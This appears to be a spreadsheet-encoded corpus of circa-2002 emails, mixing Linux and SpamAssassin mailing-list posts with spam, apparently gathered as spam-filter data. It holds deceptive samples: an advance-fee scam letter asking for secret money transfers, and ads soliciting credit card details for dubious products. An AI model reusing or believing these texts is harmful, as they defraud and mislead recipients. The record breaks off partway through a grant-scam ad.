 Mainly they were a bunch of rich people (the white/old/male is irrelivant
 but how it happened to be at the time) that didnt want to pay their taxes to
 da man er... king. So they had a revolution and formed a no-tax zone,
 leading to a very fast growing economy and dreams for all - amazing what
 an economy without 40% of everything disappearing to taxes. It was a great
 many years before their were federal taxes in the US.
 Now we give rich men who dont want to pay any taxes corporations to run,
 with enough writeoffs and loopholes that they dont have to pay any :)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: BIG NATURAL TITIS!!!
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Pb with mplayer-0.90pre7
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 this is my first problem with one of the freshrpms rpms ...
 I just upgrade mplayer and now I get
 $ mplayer 
 mplayer: error while loading shared libraries: libdvdnav.so.1: cannot open shared object file: No such file or directory
 I guess Matthias has forgotten libdvdnav dependency.
 -- 
 They told me I needed WIN95 or better
 So I chose Linux!
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: why does your vehicle make that noise?                 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;&lt;/HEAD&gt;&lt;BODY&gt;&lt;center&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3300&gt;&lt;B&gt;Protect =
 your financial well-being.&lt;BR&gt;Purchase an Extended Auto Warranty for your =
 Vehicle TODAY.&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT FACE=3DArial SIZE=3D4 COLOR=3D#=
 CC0000&gt;&lt;B&gt;&lt;U&gt;&lt;A HREF=3Dhttp://www.qzlk.com/auto/&gt;Click Here for your free,=
  Fast, no BS Rates NOW!!&lt;/A&gt;&lt;/U&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;br&gt;&lt;FONT&gt;&lt;B&gt;&lt;/center&gt;Car t=
 roubles and expensive repair bills always seem to happen at the worst poss=
 ible time Dont they?. Protect yourself and your family with an Extended&lt;br=
 &gt;Warranty for your car, truck, or SUV, so that a large expense cannot hit =
 you all at once. We cover most vehicles with less than 150,000 miles.&lt;/B&gt;&lt;=
 /FONT&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;FONT SIZE=3D4 COLOR=3D#FF3333&gt;&lt;B&gt;&lt;I&gt;Our warranties are =
 the same as the dealer offers but instead&lt;BR&gt;you are purchasing them direc=
 t!!!&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;BR&gt;&lt;BR&gt;&lt;BR&gt;&lt;FONT SIZE=3D3&gt;&lt;B&gt;&lt;I&gt;We offer fair prices a=
 nd prompt, toll-free claims service. Get an Extended Warranty on your vehi=
 cle today.&lt;/I&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;br&gt;&lt;br&gt;&lt;A HREF=3Dhttp://www.qzlk.com/auto/&gt;Click=
  here today and we will include at no extra cost:&lt;/A&gt;&lt;br&gt;&lt;Br&gt;&lt;UL TYPE=3DCI=
 RCLE&gt;&lt;BR&gt;&lt;LI&gt;24-Hour Roadside Assistance.&lt;LI&gt;Car Rental Benefits.&lt;LI&gt;Trip =
 Interruption Benefits.&lt;LI&gt;Extended Towing Benefits.&lt;/UL&gt;&lt;A HREF=3Dhttp://w=
 ww.qzlk.com/auto/&gt;Click Here for your free, Fast, no BS Rates NOW!!&lt;/A&gt;&lt;br=
 &gt;&lt;br&gt;Save now, don't wait until it is TOO LATE!&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;br&gt;&lt;FO=
 NT SIZE=3D1 COLOR=3D#FFFF99&gt;We search for the best offering's for&lt;br&gt;you; =
 we do the research and you get only The superior results&lt;br&gt;this email is =
 brought to you by; KBR . To abnegate&lt;br&gt;all future notices, &lt;FONT COLOR=3D=
 #FFFF66&gt;&lt;A HREF=3Dhttp://www.qzlk.com/index2.html&gt;Enter here&lt;/A&gt;&lt;/FONT&gt;&lt;/F=
 ONT&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;body background="glabkgnd.jpg" bgcolor="#ffffff" text="#000000" link="#006666" vlink="#999999" alink="#66cccc"&gt;
 &lt;font face="Arial, Arial, Helvetica"&gt;
 &lt;p&gt;&lt;strong&gt;This powerful drink is not labeled "Romance in a Bottle" for nothing!&lt;/strong&gt;&lt;/p&gt;
 &lt;p&gt;It's powerful blend of aphrodisiac herbs will put the sizzle back in your relationship...see for yourself!&lt;/p&gt;
 &lt;p&gt;NIAGARA is the fizzy blue herbal tonic that is sweeping the nation by storm! You've heard about it, read about it, talked about it, and watched it on television!&amp;nbsp; &lt;/p&gt;
 &lt;p&gt;The FDA does not regulate and approve herbal products. However, Niagara's ingredients listing and labeling
 does meet with FDA approval. Niagara is not suitable for children, pregnant women or persons sensitive to caffeine
 or with high blood pressure. &lt;/p&gt;
 FOR MORE INFO: &lt;A HREF="mailto:cowboy1965@etang.com?Subject=More 99 Info!"&gt;Click HERE&lt;/A&gt;&amp;nbsp;
 &lt;FONT SIZE="-1" FACE="MS Sans Serif" COLOR="Navy"&gt;OR Simply Reply with "99" in the SUBJECT Field&lt;/FONT&gt;
 &lt;p&gt;&amp;nbsp;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;The form below can be faxed to 480.314.5776&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p&gt;&lt;strong&gt;Order Form-&lt;/strong&gt;&lt;/p&gt;
 &lt;form method="POST" action="--WEBBOT-SELF--"&gt;
   &lt;p align="left"&gt;Name&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="22"&gt;&lt;/p&gt;
   &lt;p align="left"&gt;Address:&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p align="left"&gt;City:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p align="left"&gt;State&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p align="left"&gt;Zip&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
   &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p align="left"&gt;Phone&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
 	&lt;p&gt;&lt;string&gt;&lt;b&gt;Credit Card Info-&lt;/b&gt;&lt;/p&gt;
   &lt;p&gt;Credit Card Type:&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p&gt;Card
   Number&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p&gt;Expiration Date&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
   &lt;p&gt;Order Quantity&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;input type="text" name="T1" size="20"&gt;&lt;/p&gt;
 &lt;/form&gt;
 &lt;img border="0" src="Big_pic.jpg" width="304" height="178"&gt;
 &lt;p&gt;
 To Remove Your Address From Our Mailing List: &lt;A HREF="mailto:cowboy1965@etang.com?Subject=Remove Me"&gt;Click HERE&lt;/A&gt;&amp;nbsp;
 &lt;FONT SIZE="-1" FACE="MS Sans Serif" COLOR="Navy"&gt;&lt;/FONT&gt;
 &lt;/font&gt;
 &lt;/p&gt;
 &lt;/body&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 "fdisk /mbr" will not destroy the OS, it will simply restore the windows
 mbr as it was.  Running fdisk and deleting a partition would however
 destroy the OS (bu even then only if you format the disc afterwards).
 Sure wasn't it SoloCDM &lt;deedsmis@aculink.net&gt; 
 sometime around Wed, 31 Jul 2002 10:48:16 -0600 said:
 &gt; I need to ask a question concerning this issue.
 &gt; 
 &gt; What if I don't want to get rid of the MBR -- it will destroy the OS
 &gt; on that drive.  How do I remove lilo without the above fdisk
 &gt; procedure?
 &gt; 
 -- 
 Paul Askins &lt;:)
 Email:  Paul Askins &lt;paul.askins@adbvdesign.analog.com&gt;
 Behind every great man, there is a woman -- urging him on.
 		-- Harry Mudd, "I, Mudd", stardate 4513.3
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Fix Your credit Yourself ONLINE!!                 12678
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: MacNet Journal reports that OmniOutliner will support OPML soon.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:10:02:01AM
 Date: Tue, 24 Sep 2002 17:02:01 GMT
 MacNet Journal reports[1] that OmniOutliner will support OPML[2] soon. That's 
 very good news[3] indeed. 
 [1] http://www.whiterabbits.com/MacNetJournal/2002/09/23.html#a2282
 [2] http://www.opml.org/
 [3] http://www.omnigroup.com/mailman/archive/omnioutliner-users/2002-September/000402.html
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, 24 Aug 2002 11:07:00 -0700, "John Hall" &lt;johnhall@evergo.net&gt;
 said:
 &gt; Ran across a site which claimed to explain the original meaning of the
 &gt; Ten Commandments.  It seems some of those meanings have evolved a bit,
 &gt; too.
 By "meanings have evolved" do you [or they] mean that the Hebrew words
 have changed meaning or that our understanding of the Hebrew words have
 changed? Or do they posit a pre-Mosaic form of the laws that had
 evolved by time of the Pentateuch?
 &gt; In particular, there was a claim that the commandment on stealing was
 &gt; actually specifically about 'man stealing -- selling a free man into
 &gt; slavery.
 This seems bogus to me. A quick check of the text indicates the the
 Hebrew word in question is GANAV which elsewhere in the Pentateuch (eg
 Gen 44.8) is used to mean steal silver and gold amongst other things.
 In July 1999, I made the following comment in response to a similar
 claim about the "real" meaning of one of the ten commandments:
 """
 &gt; The translations since cause problems at each successive remove
 We have the original language versions, though, so this is not an
 issue.
 &gt; I'm sure most everyone is familiar with the argument that the meaning of the commandment
 &gt; is 'thou shalt not murder' rather than 'kill,'
 This has nothing to do with successive translations. It is based on our
 knowledge of the meaning of the Hebrew word "ratsach". Most modern
 translations I've seen translate it "murder" but elsewhere the word is
 used
 of an animal killing a human (something for which most English speakers
 wouldn't use the word "murder").
 """
 - http://www.xent.com/FoRK-archive/july99/0163.html
 James
 -- 
   James Tauber
   jtauber@jtauber.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Ray Ozzie: Software Platform Dynamics.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/24#When:10:21:41AM
 Date: Tue, 24 Sep 2002 17:21:41 GMT
 Ray Ozzie: Software Platform Dynamics[1].
 [1] http://www.ozzie.net/blog/stories/2002/09/24/softwarePlatformDynamics.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: URGENT BUSINESS ASSISTANCE.
</t>
  </si>
  <si>
    <t xml:space="preserve">--0-1118764524-1030968705=:44128
 Content-Type: text/plain; charset=iso-8859-1
 Content-Transfer-Encoding: 8bit
 KEVIN GEORGE
 ABIDJAN,COTE D'IVORIE
 WEST AFRICA
 Dearest one,
 Although we have not met, I got your contact through the internet and  decided to contact you for assistance. I was, until recently, a final  year engineering student of the University of Sierra Leone,West Africa.  Early in January last year, the rebels
 in my country struck our township and killed my parents in one of their attacks. My late father, King Christopher George being the King of the Town was a prime target.
 Fortunately for me, I was in school when the attack took  place. I equally lost my only sister to the rebels. When I got home for the remains of my parents and the subsequent burial that followed, I discovered a document indicating that my late father had deposited some $6M.United States Dollars(six million united states dollars) with one of the private security company here in abidjan cote d'ivorie. This money, according to the docement, was meant for the building of an Auto repair company for me by my late father,when I complete my studies. Upon the discovery of this document, I travelled to the cote d'ivorie to trace the concerned security company and to make claims for the said money as the only surviving next
 of kin to my father.
 But deliberatley, I have decided to keep all my uncles and Aunts out of the issue as none of them will be happy to know I am in possession of such money. I have succeded in making the people at the security company believe that I am the next of Kin and all the documents related to are now with me. I do not know what to do with it but I have decided to contact you to seek your assistance in helping me to take it outfrom the security company and transfer it  to your account and help me to come to your country to continue my education and so that you will help me to get the money invested until such a
 time that I will be ready to begin to use it. I am really desperate as I am left alone now in the world.Let me know what you want as compensation for helping
 me to solve this my problem. Most importantly,Iseriously appeal that you maintain high level of secrecy and confidentiality in the whole thing.
 Please you can call me wilth is number 00225-075-03684
 I remain yours sincerely,
 KEVIN GEORGE                                                                          
 ---------------------------------
 Yahoo! Mail -- Une adresse @yahoo.fr gratuite et en franais !
 --0-1118764524-1030968705=:44128
 Content-Type: text/html; charset=iso-8859-1
 Content-Transfer-Encoding: 8bit
 &lt;P align=left&gt;&lt;FONT size=3&gt;KEVIN GEORGE&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;ABIDJAN,COTE D'IVORIE&lt;BR&gt;WEST AFRICA&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;Dearest one,&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;Although we have not met, I got your contact through the internet and&amp;nbsp; decided to contact you for assistance. I was, until recently, a final&amp;nbsp; year engineering student of the University of Sierra Leone,West Africa.&amp;nbsp; Early in January last year, the rebels&lt;BR&gt;in my country struck our township and killed my parents in one of their attacks. My late father, King Christopher George being the King of the Town was a prime target.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;Fortunately for me, I was in school when the attack took&amp;nbsp; place. I equally lost my only sister to the rebels. When I got home for the remains of my parents and the subsequent burial that followed, I discovered a document indicating that my late father had deposited some $6M.United States Dollars(six million united states dollars) with one of the private security company here in abidjan cote d'ivorie. This money, according to the docement, was meant for the building of an Auto repair company for me by my late father,when I complete my studies. Upon the discovery of this document, I travelled to the cote d'ivorie to trace the concerned security company and to make claims for the said money as the only surviving next&lt;BR&gt;of kin to my father.&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;But deliberatley, I have decided to keep all my uncles and Aunts out of the issue as none of them will be happy to know I am in possession of such money. I have succeded in making the people at the security company believe that I am the next of Kin and all the documents related to are now with me. I do not know what to do with it but I have decided to contact you to seek your assistance in helping me to take it outfrom the security company and transfer it&amp;nbsp; to your account and help me to come to your country to continue my education and so that you will help me to get the money invested until such a&lt;BR&gt;time that I will be ready to begin to use it. I am really desperate as I am left alone now in the world.Let me know what you want as compensation for helping&lt;BR&gt;me to solve this my problem. Most importantly,Iseriously appeal that you maintain high level of secrecy and confidentiality in the whole thing.&lt;BR&gt;Please you can call me wilth is number 00225-075-03684&lt;BR&gt;I remain yours sincerely,&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&lt;FONT size=3&gt;KEVIN GEORGE&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 &lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=left&gt;&amp;nbsp;&lt;/P&gt;
 &lt;P align=left&gt;&amp;nbsp;&lt;/P&gt;&lt;p&gt;&lt;br&gt;&lt;hr size=1&gt;&lt;a href="http://fr.mail.yahoo.com"&gt;Yahoo! Mail&lt;/a&gt; -- Une adresse @yahoo.fr gratuite et en franais !&lt;br&gt;
 --0-1118764524-1030968705=:44128--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAdev] [Bug 1053] IMG tag based rules
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.hughes-family.org/bugzilla/show_bug.cgi?id=1053
 ------- Additional Comments From mgm@starlingtech.com  2002-10-03 21:46 -------
 Looks great! One note: most "image-only" spam actually has some text (a few 
 words at the top, a disclaimer at the end) so keep that in mind. The typical 
 image spam that slips through SA seems to have a bit of text, one huge image, 
 then a bit more.
 ------- You are receiving this mail because: -------
 You are the assignee for the bug, or are watching the assignee.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</si>
  <si>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[SACVS] CVS: spamassassin/t db_based_whitelist.t,1.7,1.8
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/t
 In directory usw-pr-cvs1:/tmp/cvs-serv4429/t
 Modified Files:
 	db_based_whitelist.t db_based_whitelist_ips.t 
 Log Message:
 fixed bug 1033: -R and -W were not respecting auto_whitelist_path
 Index: db_based_whitelist.t
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist.t,v
 retrieving revision 1.7
 retrieving revision 1.8
 diff -b -w -u -d -r1.7 -r1.8
 --- db_based_whitelist.t	26 Sep 2002 17:15:04 -0000	1.7
 +++ db_based_whitelist.t	2 Oct 2002 13:20:33 -0000	1.8
 @@ -2,7 +2,7 @@
  use lib '.'; use lib 't';
  use SATest; sa_t_init("db_based_whitelist");
 -use Test; BEGIN { plan tests =&gt; 3 };
 +use Test; BEGIN { plan tests =&gt; 8 };
  # ---------------------------------------------------------------------------
 @@ -16,17 +16,17 @@
  %patterns = %is_nonspam_patterns;
  $scr_test_args = "-M Mail::SpamAssassin::DBBasedAddrList";
 -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb);
 +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));
  # 3 times, to get into the whitelist:
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  # Now check
  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  ok_all_patterns();
  %patterns = %is_spam_patterns;
 -sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/spam/004", \&amp;patterns_run_cb));
  ok_all_patterns();
 Index: db_based_whitelist_ips.t
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/t/db_based_whitelist_ips.t,v
 retrieving revision 1.2
 retrieving revision 1.3
 diff -b -w -u -d -r1.2 -r1.3
 --- db_based_whitelist_ips.t	26 Sep 2002 17:15:04 -0000	1.2
 +++ db_based_whitelist_ips.t	2 Oct 2002 13:20:33 -0000	1.3
 @@ -2,7 +2,7 @@
  use lib '.'; use lib 't';
  use SATest; sa_t_init("db_based_whitelist_ips");
 -use Test; BEGIN { plan tests =&gt; 3 };
 +use Test; BEGIN { plan tests =&gt; 8 };
  # ---------------------------------------------------------------------------
 @@ -15,18 +15,18 @@
  %patterns = %is_nonspam_patterns;
 -sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb);
 +ok (sarun ("--remove-addr-from-whitelist whitelist_test\@whitelist.spamassassin.taint.org", \&amp;patterns_run_cb));
  # 3 times, to get into the whitelist:
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 -sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
 +ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  # Now check
  ok (sarun ("-L -a -t &lt; data/nice/002", \&amp;patterns_run_cb));
  ok_all_patterns();
  %patterns = %is_spam_patterns;
 -sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb);
 +ok (sarun ("-L -a -t &lt; data/spam/007", \&amp;patterns_run_cb));
  ok_all_patterns();
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Hello ~name~,
 If you ordered a flat-rate domestic calling product or a 20 minute free trial using a local access number, your service will be operating in about 24-48 hours or on your designated trial date and time.  Please try dialing the access number you found on your reseller's web page at:
 http://www.internationalfreecall.com
 If you ordered a flat-rate domestic calling product using a 1-800 toll-free access number, your service will be operating within 1-2 work days.
 Please try dialing 1-866-865-4548.
 In either case, when your service is switched on, you will hear a voice ask you to dial the number you are calling.
 You must dial 1+area code+7 digit number followed by # to make any calls: local or long distance.
 Example - To call www.internationalfreecall.com, you would dial the following after dialing your access number and listening for the voice:
 1-410-608-8178# 
 Please use this service for all your calling and you will never pay more than your monthly fee again. There are no taxes or surcharges, so dial away!
 Finally, I recommend entering the access number into your speed dial settings on your telephone.  This will make your service quicker and easier to use, and thus more enjoyable.
 If you have any questions, please contact us for more information.
 In addition, if you need product enhancements like 3-way calling, portable calling cards, international calling products, or marketing tools, please visit:
 http://www.internationalfreecall.com
 In the meantime, the other network on this free calling promotion is OPEX, which is offering 100 minutes of free long distance for trying their program.  
 Opex's usual rates are 4.5 cents per minute for domestic calls, with great international rates, too!
 For more information on OPEX, or to sign up, please click below:
 http://cognigen.net/opex/main.cgi?lietuva
 To unsubscribe from this mailing list, please click on:
 http://www.internationalfreecall.com/cgi-bin/aefs/subscribe.cgi?user=info&amp;listid=3.list&amp;id=5587
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Psyche: Anyone else tried it?
</t>
  </si>
  <si>
    <t xml:space="preserve">
     Damn, this thing is slick.  Someone seems to have done a very complete QA test on it; yesterday I installed it for the first time on an old Celeron box.  Sure, parts of it were slow, but compared to my more modern machine, everything is.  It was good; a beautiful interface that legions of 'sheep' can look at and say "Cool; I can understand this" and leave their shackles behind.  :)
     I was struck by the massive amount of applications, both KDE and Gnome, intuitively seperated NOT by the Gnome/KDE names, but by their **meanings** instead.  It's obvious that someone spent a lot of time improving the usability and graphics to make it more 'international'; the web browser graphic, for example, has a 'world' icon with a mouse wrapped around it. Office-apps have familiar pens, paper, and/or calculators involved.
     This is a Linux that I can plop down in front of almost anyone, and they can figure it out.
     At some point I'd miss the character of KDE/Gnome, and I'll probably 'hotrod' the graphics setup with my own themes, etc.  But for the wide release, this one's IT.  If you get a chance, try this; I think you'll be surprisingly pleased.
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 Just machines, to make big decisions- programmed by fellas with
 compassion and vision.  We'll be clean when that work is done;
 Eternally free and eternally young.  Linux.
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body bgcolor="#FFFBE0"&gt;
 &lt;center&gt;
 &lt;font face="verdana" size="1" color="#000000"&gt;smart shoppers &lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="1" color="#0000ff"&gt;click here&lt;/font&gt;
 &lt;/a&gt; for the best rates&lt;/font&gt;&lt;br&gt;
 &lt;table border="0" cellpadding="2" cellspacing="0"&gt;
  &lt;tr&gt;
   &lt;td bgcolor="#000000"&gt;
    &lt;table bgcolor="#ffffff" border="0" width="470" cellpadding="8" cellspacing="0"&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;Paying Too Much for Life Insurance?
       &lt;br&gt;&lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="4" color="#0000ff"&gt;Click Here to Save 70% on Your Policy&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="left"&gt;
       &lt;br&gt;
       &lt;font face="verdana" size="2" color="#000000"&gt;In today's world, it's important to expect the unexpected.  When preparing for
       the future, we must always consider our family.  To plan for your family's future, &lt;i&gt;the right life insurance policy is a 
       necessity.&lt;/i&gt; But who wants to pay too much for life insurance?  Let us help you find &lt;b&gt;the right quote, quickly and 
       easily... &lt;/font&gt;&lt;font face="verdana" size="2" color="#ff0000"&gt;for FREE.&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="verdana" size="4" color="#737373"&gt;&lt;b&gt;Compare your coverage...&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
      &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$250,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$6.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month&lt;/font&gt;
       &lt;br&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$500,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$9.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month&lt;/font&gt;
       &lt;br&gt;
       &lt;font face="arial" size="5" color="#000000"&gt;&lt;b&gt;$1,000,000... &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#737373"&gt;as low as &lt;/font&gt;
       &lt;font face="arial" size="5" color="#8B0909"&gt;&lt;b&gt;$15.50 &lt;/b&gt;&lt;/font&gt;
       &lt;font face="arial" size="4" color="#000000"&gt;per month!&lt;/font&gt;
       &lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;a href="http://www.marketing-leader.com/user0202/instant_savings"&gt;&lt;font face="verdana" size="4" color="#0000ff"&gt;&lt;b&gt;Get a FREE Instant Quote&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
     &lt;tr&gt;
      &lt;td align="center"&gt;
       &lt;font face="arial" size="3" color="#8B0909"&gt;&lt;b&gt;&lt;i&gt;Prepare for your family's future&lt;/i&gt;&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
       &lt;font face="arial" size="1" color="#737373"&gt;Compare the lowest prices from the top insurance companies in the nation&lt;/font&gt;&lt;/td&gt;
     &lt;/tr&gt;
    &lt;/table&gt;
   &lt;/td&gt;
  &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/center&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hey!
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;
 &lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;&lt;/font&gt;&lt;/a&gt;&lt;font size="1" color="#FFFFFF"&gt;v&lt;/font&gt;&lt;/span&gt;&lt;/TD&gt;
                     &lt;/TR&gt;
                     &lt;TR VALIGN=TOP ALIGN=LEFT&gt;
                         &lt;TD&gt;&lt;/TD&gt;
                         &lt;TD WIDTH=575 CLASS="TextObject"&gt;
                             &lt;P CLASS="header" align="center"&gt;&lt;b&gt;&lt;font size="4"&gt;America's #1 Government Grant Program!&lt;/font&gt;&lt;/b&gt;&lt;/P&gt;
                             &lt;P STYLE="text-align: justify;"&gt;&lt;span style="font-size: 18.0pt; font-family: Impact; color: #3737FF"&gt;The Federal Government Gives Away Billions of Dollars In Grants Each &amp;amp; Every Year (Free
                             Money!)
                             Take Advantage Of This Opportunity Today And Change Your Life
                             Forever!&lt;/P&gt;
                             &lt;P STYLE="text-align: center;"&gt;&lt;B&gt;&lt;SPAN STYLE="color: rgb(255,0,0);"&gt;&amp;nbsp;&lt;/SPAN&gt;&lt;/B&gt;
